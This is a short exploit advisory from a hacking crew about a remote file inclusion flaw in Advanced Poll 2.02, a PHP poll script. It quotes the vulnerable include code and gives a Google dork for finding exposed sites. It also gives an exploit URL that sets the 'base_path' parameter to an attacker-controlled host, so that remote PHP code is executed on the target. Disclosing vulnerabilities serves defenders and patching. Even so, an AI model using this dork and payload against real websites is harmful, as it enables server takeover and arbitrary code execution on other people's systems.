#############################SolpotCrew Community################################ # # Advanced Poll ver 2.02 (base_path) Remote File Inclusion # # Vendor site : http://www.proxy2.de/scripts.php # ################################################################################# # # # Bug Found By :Solpot a.k.a (k. Hasibuan) # # contact: chris_hasibuan@yahoo.com # # Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt # ################################################################################ # # # Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , # L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy # home_edition2001 , Rendy ,Tje , m3lky , no-profile # and all crew #mardongan @ irc.dal.net # # ############################################################################### Input passed to the "base_path" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from /admin/common.inc.php $pollvars['SELF'] = basename($PHP_SELF); if (file_exists("$base_path/lang/$pollvars[lang]")) { include ("$base_path/lang/$pollvars[lang]"); } else { include ("$base_path/lang/english.php"); google dork : inurl:comments.php?action= send id EXPLOIT : http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F##################################